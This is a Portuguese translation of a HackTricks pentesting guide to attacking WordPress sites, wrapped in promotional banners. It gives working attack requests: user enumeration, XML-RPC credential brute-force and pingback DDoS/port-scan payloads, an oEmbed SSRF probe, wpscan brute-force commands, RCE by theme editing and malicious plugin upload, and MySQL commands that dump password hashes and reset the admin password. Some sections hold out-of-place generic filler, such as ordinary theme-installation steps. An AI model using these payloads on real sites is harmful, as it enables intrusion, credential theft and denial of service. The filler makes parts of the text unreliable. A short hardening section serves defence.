24 KiB
Wordpress
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Você trabalha em uma empresa de segurança cibernética? Você quer ver sua empresa anunciada no HackTricks? ou você quer ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Verifique os PLANOS DE ASSINATURA!
- Descubra A Família PEASS, nossa coleção exclusiva de NFTs
- Adquira o swag oficial PEASS & HackTricks
- Junte-se ao 💬 grupo Discord ou ao grupo telegram ou siga-me no Twitter 🐦@carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para o repositório hacktricks e repositório hacktricks-cloud.
Use Trickest para construir e automatizar fluxos de trabalho com as ferramentas comunitárias mais avançadas do mundo.
Acesse hoje:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Informações Básicas
Os arquivos enviados vão para: http://10.10.10.10/wp-content/uploads/2018/08/a.txt
Os arquivos de temas podem ser encontrados em /wp-content/themes/, então se você alterar algum php do tema para obter RCE, provavelmente usará esse caminho. Por exemplo: Usando o tema twentytwelve, você pode acessar o arquivo 404.php em: /wp-content/themes/twentytwelve/404.php
Outra URL útil poderia ser: /wp-content/themes/default/404.php
No arquivo wp-config.php, você pode encontrar a senha raiz do banco de dados.
Caminhos de login padrão para verificar: /wp-login.php, /wp-login/, /wp-admin/, /wp-admin.php, /login/
Principais Arquivos do WordPress
index.php
license.txt
contém informações úteis, como a versão do WordPress instalada.wp-activate.php
é usado para o processo de ativação por e-mail ao configurar um novo site WordPress.- Pastas de login (podem ser renomeadas para ocultá-las):
/wp-admin/login.php
/wp-admin/wp-login.php
/login.php
/wp-login.php
xmlrpc.php
é um arquivo que representa um recurso do WordPress que permite a transmissão de dados com HTTP atuando como mecanismo de transporte e XML como mecanismo de codificação. Esse tipo de comunicação foi substituído pela API REST do WordPress.- A pasta
wp-content
é o diretório principal onde os plugins e temas são armazenados. wp-content/uploads/
é o diretório onde os arquivos enviados para a plataforma são armazenados.wp-includes/
é o diretório onde os arquivos principais são armazenados, como certificados, fontes, arquivos JavaScript e widgets.
Pós-exploração
- O arquivo
wp-config.php
contém informações necessárias pelo WordPress para se conectar ao banco de dados, como o nome do banco de dados, o host do banco de dados, o nome de usuário e a senha, as chaves de autenticação e os salts, e o prefixo da tabela do banco de dados. Esse arquivo de configuração também pode ser usado para ativar o modo DEBUG, que pode ser útil para solução de problemas.
Permissões dos usuários
- Administrador
- Editor: Publica e gerencia suas próprias postagens e as de outros.
- Autor: Publica e gerencia suas próprias postagens.
- Contribuidor: Escreve e gerencia suas postagens, mas não pode publicá-las.
- Assinante: Navega pelas postagens e edita seu perfil.
Enumeração Passiva
Obter a versão do WordPress
Verifique se você pode encontrar os arquivos /license.txt
ou /readme.html
Dentro do código-fonte da página (exemplo de https://wordpress.org/support/article/pages/):
- grep
curl https://victim.com/ | grep 'content="WordPress'
meta name
- Arquivos de link CSS
- Arquivos JavaScript
Obter Plugins
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/plugins/' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
Obter Temas
Para obter temas no WordPress, você pode seguir estas etapas:
- Acesse o painel de administração do WordPress.
- No menu lateral, clique em "Aparência" e selecione "Temas".
- Você será direcionado para a página de temas, onde poderá ver os temas instalados atualmente.
- Para adicionar um novo tema, clique no botão "Adicionar Novo".
- Navegue pelos temas disponíveis ou use a barra de pesquisa para encontrar um tema específico.
- Quando encontrar um tema que deseja instalar, clique no botão "Instalar".
- Após a instalação, clique no botão "Ativar" para ativar o tema.
Agora você tem um novo tema instalado e ativado em seu site WordPress.
curl -s -X GET https://wordpress.org/support/article/pages/ | grep -E 'wp-content/themes' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
Extrair versões em geral
Ao realizar testes de penetração em um site WordPress, é importante extrair informações sobre as versões dos componentes utilizados. Isso pode ajudar a identificar vulnerabilidades conhecidas e determinar se o site está atualizado com as versões mais recentes.
Existem várias maneiras de extrair informações sobre as versões do WordPress e dos plugins instalados:
-
Página de login: A versão do WordPress geralmente é exibida na página de login. Verifique o código-fonte da página ou use ferramentas de desenvolvedor para encontrar essa informação.
-
Arquivos de estilo: Alguns temas do WordPress exibem a versão do WordPress no arquivo de estilo do tema. Procure por um comentário no início do arquivo que indique a versão.
-
Arquivos de manifesto: Os plugins do WordPress geralmente possuem um arquivo de manifesto (manifest file) que contém informações sobre a versão. Procure por arquivos como
plugin-name.php
ouplugin-name/readme.txt
e verifique o conteúdo para encontrar a versão. -
Headers HTTP: Ao fazer uma solicitação HTTP para o site WordPress, verifique os headers de resposta para encontrar informações sobre a versão. Procure por headers como
X-Powered-By
ouX-Generator
. -
Ferramentas de escaneamento: Existem várias ferramentas de escaneamento automatizado que podem ajudar a extrair informações sobre as versões do WordPress e dos plugins instalados. Alguns exemplos populares incluem WPScan, WPScanGUI e WPScan Online.
Ao extrair informações sobre as versões, é importante lembrar de não utilizar essas informações para fins maliciosos. O objetivo é apenas identificar possíveis vulnerabilidades e ajudar a manter o site seguro.
curl -s -X GET https://wordpress.org/support/article/pages/ | grep http | grep -E '?ver=' | sed -E 's,href=|src=,THIIIIS,g' | awk -F "THIIIIS" '{print $2}' | cut -d "'" -f2
Use Trickest para construir e automatizar facilmente fluxos de trabalho com as ferramentas comunitárias mais avançadas do mundo.
Acesse hoje mesmo:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Enumeração ativa
Plugins e Temas
Provavelmente você não conseguirá encontrar todos os Plugins e Temas possíveis. Para descobrir todos eles, você precisará forçar ativamente uma lista de Plugins e Temas (felizmente, existem ferramentas automatizadas que contêm essas listas).
Usuários
ID Brute
Você obtém usuários válidos de um site WordPress forçando IDs de usuários:
curl -s -I -X GET http://blog.example.com/?author=1
Se as respostas forem 200 ou 30X, isso significa que o id é válido. Se a resposta for 400, então o id é inválido.
wp-json
Você também pode tentar obter informações sobre os usuários consultando:
curl http://blog.example.com/wp-json/wp/v2/users
Apenas informações sobre os usuários que possuem esse recurso habilitado serão fornecidas.
Também observe que /wp-json/wp/v2/pages pode vazar endereços IP.
Enumeração de nomes de usuário de login
Ao fazer login em /wp-login.php
, a mensagem é diferente se o nome de usuário indicado existe ou não.
XML-RPC
Se xml-rpc.php
estiver ativo, você pode realizar uma força bruta de credenciais ou usá-lo para lançar ataques de negação de serviço a outros recursos. (Você pode automatizar esse processo usando isso, por exemplo).
Para verificar se está ativo, tente acessar /xmlrpc.php e envie esta solicitação:
Verificar
<methodCall>
<methodName>system.listMethods</methodName>
<params></params>
</methodCall>
Força Bruta de Credenciais
wp.getUserBlogs
, wp.getCategories
ou metaWeblog.getUsersBlogs
são alguns dos métodos que podem ser usados para força bruta de credenciais. Se você encontrar algum deles, pode enviar algo como:
<methodCall>
<methodName>wp.getUsersBlogs</methodName>
<params>
<param><value>admin</value></param>
<param><value>pass</value></param>
</params>
</methodCall>
A mensagem "Nome de usuário ou senha incorretos" dentro de uma resposta de código 200 deve aparecer se as credenciais não forem válidas.
Usando as credenciais corretas, você pode fazer upload de um arquivo. Na resposta, o caminho aparecerá (https://gist.github.com/georgestephanis/5681982)
<?xml version='1.0' encoding='utf-8'?>
<methodCall>
<methodName>wp.uploadFile</methodName>
<params>
<param><value><string>1</string></value></param>
<param><value><string>username</string></value></param>
<param><value><string>password</string></value></param>
<param>
<value>
<struct>
<member>
<name>name</name>
<value><string>filename.jpg</string></value>
</member>
<member>
<name>type</name>
<value><string>mime/type</string></value>
</member>
<member>
<name>bits</name>
<value><base64><![CDATA[---base64-encoded-data---]]></base64></value>
</member>
</struct>
</value>
</param>
</params>
</methodCall>
Também há uma maneira mais rápida de forçar credenciais usando system.multicall
pois você pode tentar várias credenciais na mesma solicitação:
Burlar a autenticação de dois fatores (2FA)
Este método é destinado a programas e não a humanos, e é antigo, portanto não suporta 2FA. Portanto, se você tiver credenciais válidas, mas a entrada principal estiver protegida por 2FA, você pode abusar do xmlrpc.php para fazer login com essas credenciais, burlando o 2FA. Observe que você não poderá executar todas as ações que pode fazer pelo console, mas ainda poderá obter RCE, como Ippsec explica em https://www.youtube.com/watch?v=p8mIdm93mfw&t=1130s
DDoS ou varredura de porta
Se você encontrar o método pingback.ping na lista, pode fazer o Wordpress enviar uma solicitação arbitrária para qualquer host/porta.
Isso pode ser usado para solicitar que milhares de sites Wordpress acessem um local específico (causando um DDoS nesse local) ou você pode usá-lo para fazer o Wordpress varrer uma rede interna (você pode indicar qualquer porta).
<methodCall>
<methodName>pingback.ping</methodName>
<params><param>
<value><string>http://<YOUR SERVER >:<port></string></value>
</param><param><value><string>http://<SOME VALID BLOG FROM THE SITE ></string>
</value></param></params>
</methodCall>
Se você receber faultCode com um valor maior que 0 (17), significa que a porta está aberta.
Dê uma olhada no uso de system.multicall
na seção anterior para aprender como abusar desse método para causar DDoS.
DDoS
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param><value><string>http://target/</string></value></param>
<param><value><string>http://yoursite.com/and_some_valid_blog_post_url</string></value></param>
</params>
</methodCall>
wp-cron.php DoS
Este arquivo geralmente existe na raiz do site Wordpress: /wp-cron.php
Quando este arquivo é acessado, uma consulta MySQL "pesada" é realizada, então pode ser usado por atacantes para causar um DoS.
Além disso, por padrão, o wp-cron.php
é chamado em cada carregamento de página (sempre que um cliente solicita qualquer página do Wordpress), o que em sites de alto tráfego pode causar problemas (DoS).
Recomenda-se desativar o Wp-Cron e criar um cronjob real dentro do host que execute as ações necessárias em um intervalo regular (sem causar problemas).
/wp-json/oembed/1.0/proxy - SSRF
Tente acessar https://worpress-site.com/wp-json/oembed/1.0/proxy?url=ybdk28vjsa9yirr7og2lukt10s6ju8.burpcollaborator.net e o site Wordpress pode fazer uma solicitação para você.
Esta é a resposta quando não funciona:
SSRF
{% embed url="https://github.com/t0gu/quickpress/blob/master/core/requests.go" %}
Esta ferramenta verifica se o methodName: pingback.ping e o caminho /wp-json/oembed/1.0/proxy existem e, se existirem, tenta explorá-los.
Ferramentas Automáticas
cmsmap -s http://www.domain.com -t 2 -a "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0"
wpscan --rua -e ap,at,tt,cb,dbe,u,m --url http://www.domain.com [--plugins-detection aggressive] --api-token <API_TOKEN> --passwords /usr/share/wordlists/external/SecLists/Passwords/probable-v2-top1575.txt #Brute force found users and search for vulnerabilities using a free API token (up 50 searchs)
#You can try to bruteforce the admin user using wpscan with "-U admin"
Use Trickest para construir e automatizar facilmente fluxos de trabalho com as ferramentas comunitárias mais avançadas do mundo.
Obtenha acesso hoje:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Obtenha acesso sobrescrevendo um bit
Mais do que um ataque real, isso é uma curiosidade. No CTF https://github.com/orangetw/My-CTF-Web-Challenges#one-bit-man, você pode inverter 1 bit de qualquer arquivo do WordPress. Portanto, você pode inverter a posição 5389
do arquivo /var/www/html/wp-includes/user.php
para anular a operação NOT (!
).
if ( ! wp_check_password( $password, $user->user_pass, $user->ID ) ) {
return new WP_Error(
RCE do Painel
Modificando um arquivo php do tema usado (é necessário ter credenciais de administrador)
Aparência → Editor de Temas → Modelo 404 (à direita)
Altere o conteúdo para um shell php:
Pesquise na internet como você pode acessar essa página atualizada. Neste caso, você precisa acessar aqui: http://10.11.1.234/wp-content/themes/twentytwelve/404.php
MSF
Você pode usar:
use exploit/unix/webapp/wp_admin_shell_upload
Plugin RCE
Plugin PHP
É possível fazer upload de arquivos .php como um plugin.
Crie sua backdoor em php usando, por exemplo:
Em seguida, adicione um novo plugin:
Faça o upload do plugin e clique em Instalar Agora:
Clique em Proceder:
Provavelmente isso não fará nada aparentemente, mas se você for para Mídia, verá sua shell enviada:
Acesse-a e você verá a URL para executar a reverse shell:
Fazendo upload e ativando um plugin malicioso
(Esta parte é copiada de https://www.hackingarticles.in/wordpress-reverse-shell/)
Às vezes, os usuários logados não possuem autorização de gravação para fazer modificações no tema do WordPress, então escolhemos "Inject WP plugin malicious" como uma estratégia alternativa para obter uma web shell.
Portanto, uma vez que você tenha acesso ao painel do WordPress, você pode tentar instalar um plugin malicioso. Aqui, eu já baixei o plugin vulnerável do exploit db.
Clique aqui para baixar o plugin para praticar.
Como temos o arquivo zip para o plugin, agora é hora de fazer o upload do plugin.
Painel > plugins > fazer upload do plugin
Procure o arquivo zip baixado, conforme mostrado.
Depois que o pacote for instalado com sucesso, precisamos ativar o plugin.
Quando tudo estiver configurado corretamente, vá para a exploração. Como instalamos o plugin vulnerável chamado "reflex-gallery" e ele é facilmente explorável.
Você obterá o exploit para essa vulnerabilidade dentro do framework Metasploit e, em seguida, carregue o módulo abaixo e execute o seguinte comando:
À medida que os comandos acima são executados, você terá sua sessão meterpreter. Assim como retratado neste artigo, existem vários métodos para explorar um site baseado em WordPress.
Pós-Exploração
Extrair nomes de usuários e senhas:
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;select concat_ws(':', user_login, user_pass) from wp_users;"
Alterar senha do administrador:
Para garantir a segurança do seu site WordPress, é importante alterar regularmente a senha do administrador. Siga as etapas abaixo para alterar a senha do administrador:
- Faça login no painel de administração do WordPress.
- No menu lateral, clique em "Usuários".
- Selecione o usuário "admin" na lista de usuários.
- Role a página até a seção "Alterar Senha".
- Clique no link "Gerar Senha" para gerar uma nova senha segura automaticamente.
- Copie a nova senha gerada ou defina uma senha personalizada.
- Clique no botão "Atualizar Perfil" para salvar as alterações.
Certifique-se de escolher uma senha forte, que contenha uma combinação de letras maiúsculas e minúsculas, números e caracteres especiais. Evite usar senhas óbvias ou fáceis de adivinhar.
Após alterar a senha do administrador, lembre-se de atualizar todas as informações de login relacionadas ao seu site WordPress para garantir a segurança contínua.
mysql -u <USERNAME> --password=<PASSWORD> -h localhost -e "use wordpress;UPDATE wp_users SET user_pass=MD5('hacked') WHERE ID = 1;"
Proteção do WordPress
Atualizações regulares
Certifique-se de que o WordPress, plugins e temas estejam atualizados. Além disso, confirme se a atualização automática está habilitada no arquivo wp-config.php:
define( 'WP_AUTO_UPDATE_CORE', true );
add_filter( 'auto_update_plugin', '__return_true' );
add_filter( 'auto_update_theme', '__return_true' );
Também, instale apenas plugins e temas confiáveis do WordPress.
Plugins de Segurança
Outras Recomendações
- Remova o usuário padrão admin
- Use senhas fortes e 2FA
- Periodicamente revise as permissões dos usuários
- Limite as tentativas de login para prevenir ataques de Força Bruta
- Renomeie o arquivo
wp-admin.php
e permita o acesso apenas internamente ou de determinados endereços IP.
Use Trickest para construir e automatizar fluxos de trabalho facilmente, alimentados pelas ferramentas comunitárias mais avançadas do mundo.
Acesse hoje mesmo:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
- Você trabalha em uma empresa de cibersegurança? Gostaria de ver sua empresa anunciada no HackTricks? Ou gostaria de ter acesso à última versão do PEASS ou baixar o HackTricks em PDF? Confira os PLANOS DE ASSINATURA!
- Descubra The PEASS Family, nossa coleção exclusiva de NFTs
- Adquira o swag oficial do PEASS & HackTricks
- Junte-se ao 💬 grupo Discord ou ao grupo Telegram ou siga-me no Twitter 🐦@carlospolopm.
- Compartilhe suas técnicas de hacking enviando PRs para o repositório hacktricks e para o repositório hacktricks-cloud.